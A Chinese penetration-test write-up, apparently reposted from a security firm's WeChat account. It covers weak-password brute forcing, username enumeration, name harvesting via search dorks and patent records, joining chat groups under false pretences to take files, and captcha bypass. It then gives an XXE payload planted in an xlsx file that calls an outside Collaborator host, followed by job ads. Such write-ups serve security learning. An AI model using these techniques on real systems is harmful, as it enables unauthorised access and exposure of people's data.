记一次实战xxe及弱口令爆破学习
2022-8-25 00:0:37 Author: 白帽子(查看原文) 阅读量:27 收藏

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

前言

最近做的一次渗透测试,给的两个系统都只有一个登陆页面,也不能测试子域名或者其他端口。两个系统打开看了看挑了一个看起来比较容易好搞的软柿子。简单的测试了一下弱口令,注入没有啥结果。

开始信息收集,发现一些可能存在问题的点都记录下来一点点去测:

越测越绝望,看来还是不好搞。因为登陆框登陆失败信息很统一,不确定存在什么用户,所以用了常见用户名+top1000密码去爆破,跑了一上午没跑出来。

想着不能低危三连,去群里找销售问问能不能给个测试账号,客户不提供.......看来只能低危三连了

去群里找了以往的模板,准备照着写一下报告,然而神奇的事情发生了,这个项目半年前有过一次测试,大佬再其中一个系统中测出了一个弱口令。

用户名:admin。密码:域名+8899

报着试一试的心态往登陆框一输,然后进去了..............................ohhhhhhhhh

明明也是一个弱口令,我为啥一开始没测出来,陷入了深深的反思.....看来弱口令爆破也是有操作的。

借此机会好好学习一下弱口令爆破那些事。

No.1

弱口令爆破的一些姿势学习记录

1.用户名确定方法

因为一些网站登陆框,输入不存在的用户名,会提示:用户名不存在,请重新输入 (这种情况下其实就可以提一个用户名枚举的漏洞)。

我们根据该信息可以枚举用户名,如果枚举的用户名很多的话,就可以用这些用户名,批量去撞弱口令,可以大大提高爆破成功率。

1.1 用户名枚举漏洞

用户名枚举主要就是利用,输入存在用户名和不存在用户名时返回信息不同来确认。而用户名枚举,因为不是爆破同一个账号的密码,所以不容易引起系统,waf拦截还是很好用的。

而登陆页面中可以输入用户名的地方有三处:登陆框,密码找回,注册

举一些栗子:

某校登陆框:

错误的用户名提示:提示用户名或密码错误,乍一看没什么问题

但是输入正确的用户名,错误的密码时:

根据返回信息不同,进行用户名枚举:

枚举到一个11用户。其实学校的话完全可以使用搜索引擎来收集学号,撞弱口令,这里只是为了简单演示

某src注册接口:

注册接口,手机号存在会提示:用户名已存在。

用户不存在,会提示:验证码以发送。

虽然发送同一ip发起发送验证码请求过多会提示:验证码请求频繁,但是当手机号存在时依旧会提示:用户名已存在。

从而造成注册手机号枚举。

1.2 利用公开信息收集用户名

搜索引擎收集:

比如,收集高校学号信息

site:*.test.edu.cn 学号

就能收集到很多,更进一步收集还有收集泄露的office文件,一般excel文件中比较多

site:*.test.edu.cn filetype:xlsx 学号site:*.test.edu.cn filetype:docx

企业公开信息:

最近p神在小密圈分享了一个找用户名的小技巧:

爆破弱口令的时候经常需要目标公司的员工姓名组成字典,但员工姓名字典从哪来呢?
大型公司(员工数量5k+),可以根据中国姓名拼音Top500来做。但是对于千人及以下的中小型创业公司就不是很灵了。
分享一种方法,适用于所有公司(尤其是科技公司),就是爬一下这个公司的专利信息列表。由于专利信息都是公开的,能找到大量人员真实姓名,而且多半是技术人员。
企查查和天眼查都可以做这个事情。

我们来实践一下这个技巧:打开天眼查,输入公司名称--->进入公司主页--->找到知识产权部分。即可看到很多知识产权信息,点击详情即可看到发明人姓名

社交软件:

社交软件,大佬都有很多骚操作,简单分享一下我知道的。

比如我们可以搜索qq群:

2020级清华大学通知群某公司xx项目开发群...

编造一下加群信息,进入群的瞬间打开文件,下载所有群文件....也许有意想不到的收获

具体操作没实践过...大佬们可在得到测试授权的情况下自行尝试。

2.密码生成

个人感觉,密码爆破时针对性的生成目标字典,再配合top500,top10000字典,可以大大提高成功率。

密码生成主要使用一些小工具,这里简单推荐一下用起来感觉不错的工具:

2.1 pydictor

项目地址:https://github.com/LandGrey/pydictor

该工具有很多模块,其中社会工程学字典模块,可以根据用户信息针对性生成字典:

python pydictor.py --sedb

设置收集到的用户名,邮箱,生日等可以针对性的生成字典。

该工具还有字典合并去重,字典编码等多种功能,也可以单独 编写扩展插件。

2.2 杂七杂八的小工具

网上流通的各种小工具....可以试试,部分感觉还行。

在线字典生成网站:

https://www.bugku.com/mima/

大佬们有好用的社工库的话,根据收集的信息直接查,形成降维打击也是很好的选择,这个不多说。

2.3 一些小尝试

感觉密码爆破更多的还是看运气,更多的操作只是提高爆破成功的概率,反正多试试。

毕竟鲁迅先生曾经说过,人类所有的伟大都来源于试一试。

常用手段出不来,可以试试:

域名,用户名,企业名,后台名称加1-5位随机数字。
如:htgl8899,zhangsan2020

六位数字太费时间就不优先考虑了

3.存在验证码

存在验证码,验证码过弱,或者存在绕过缺陷也是可以被爆破的

3.1 验证码识别

pkavhttpfuzzer

验证码识别可以使用pkavhttpfuzzer,该工具可以识别一些特别简单的验证码

也可以使用burp插件:https://github.com/c0ny1/captcha-killer

调用第三方的打码平台接口

比如这里调用:http://www.ttshitu.com/ 的识别接口,识别效果还是不错的。不过太贵了,一般渗透测试,不至于不至于...

也可以自己开发训练验证码识别接口,这个没有深究过,大佬们可自行尝试

3.2 验证码绕过

验证码有时候存在缺陷可能导致被绕过

先知有大佬文章详细的说了验证码的绕过姿势,这里就不照搬了

放一下连接:

[红日安全]Web安全Day14 - 验证码实战攻防 :

https://xz.aliyun.com/t/6971

逻辑让我崩溃之验证码姿势分享 : https://xz.aliyun.com/t/4533

No.2

弱口令登陆后的xxe

回到一开始的项目,弱口令登陆后台之后,第一步当然是找上传点,找到一个上传excel文件上传的。抓包进行任意文件上传测试,发现上传不会返回路径,只解析文件的内容并返回到页面上,估计服务器都没有保存上传的文件,任意文件上传不存在。

但是发现服务器对文件存在解析,而且还是xlsx文件,xlsx文件主要由xml文件构成,解析过程中可能会存在xxe漏洞

制作poc文件进行尝试:

更改test.xlsx文件后缀位test.zipunzip test.zip
vim '[Content_Types].xml'
添加paylaod:<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://mkazyh916th6c7sw7qmgbxv87zdp1e.burpcollaborator.net"> ]><foo>&xxe;</foo>

重新压缩回去:

zip -r test.xlsx ./*

重新上传文件,发现接收到了服务器的请求,确定漏洞存在

这也算是第一次在实战中遇到文件上传的xxe (^_^),推荐一道ctf题练习:
https://buuoj.cn/challenges# [%E7%BD%91%E9%BC%8E%E6%9D%AF%202020%20%E9%9D%92%E9%BE%99%E7%BB%84]filejava

整体文章算是对自己之前项目的一个总结,该项目还存在很多问题,但碍于时间,和自己太菜没有getshell,争取下次一定getshell!!!

招聘

安恒雷神众测SRC运营(实习生)
————————
【职责描述】
1.  负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;
2.  负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;
3.  参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;
4.  积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;
5.  积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。

【任职要求】 
 1.  责任心强,性格活泼,具备良好的人际交往能力;
 2.  对网络安全感兴趣,对行业有基本了解;
 3.  良好的文案写作能力和活动组织协调能力。

 4.  具备美术功底、懂得设计美化等

简历投递至 [email protected]

设计师(实习生)

————————

【职位描述】
负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。

【职位要求】
1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;
2、有良好的美术功底,审美能力和创意,色彩感强;精通photoshop/illustrator/coreldrew/等设计制作软件;
3、有品牌传播、产品设计或新媒体视觉工作经历;

【关于岗位的其他信息】
企业名称:杭州安恒信息技术股份有限公司
办公地点:杭州市滨江区安恒大厦19楼
学历要求:本科及以上
工作年限:1年及以上,条件优秀者可放宽

简历投递至 [email protected]

岗位:红队武器化Golang开发工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;
2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;
3.了解docker,能进行简单的项目部署;
3.熟悉常见web漏洞原理,并能写出对应的利用工具;
4.熟悉TCP/IP协议的基本运作原理;
5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式、消息队列等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。

简历投递至 [email protected]

安全招聘
————————

公司:安恒信息
岗位:Web安全 安全研究员
部门:战略支援部
薪资:13-30K
工作年限:1年+
工作地点:杭州(总部)、广州、成都、上海、北京

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…

【岗位职责】
1.定期面向部门、全公司技术分享;
2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;
3.负责完成部门渗透测试、红蓝对抗业务;
4.负责自动化平台建设
5.负责针对常见WAF产品规则进行测试并落地bypass方案

【岗位要求】
1.至少1年安全领域工作经验;
2.熟悉HTTP协议相关技术
3.拥有大型产品、CMS、厂商漏洞挖掘案例;
4.熟练掌握php、java、asp.net代码审计基础(一种或多种)
5.精通Web Fuzz模糊测试漏洞挖掘技术
6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法
7.有过独立分析漏洞的经验,熟悉各种Web调试技巧
8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)

【加分项】
1.具备良好的英语文档阅读能力;
2.曾参加过技术沙龙担任嘉宾进行技术分享;
3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;
4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;
5.开发过安全相关的开源项目;
6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;
7.个人技术博客;
8.在优质社区投稿过文章;

岗位:安全红队武器自动化工程师
薪资:13-30K
工作年限:2年+
工作地点:杭州(总部)

【岗位职责】
1.负责红蓝对抗中的武器化落地与研究;
2.平台化建设;
3.安全研究落地。

【岗位要求】
1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;
2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;
3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;
4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;
5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。

【加分项】
1.有高并发tcp服务、分布式等相关经验者优先;
2.在github上有开源安全产品优先;
3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;
4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;
5.具备良好的英语文档阅读能力。

简历投递至 [email protected]

专注渗透测试技术

全球最新网络攻击技术

END


文章来源: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246310&idx=1&sn=1645adab54cfe46898c2e2188214768d&chksm=82ea570fb59dde199973daee1f3198a7b174ddc9805f3a16088754a7e9044e6cb99e09e98eca#rd
如有侵权请联系:admin#unsafe.sh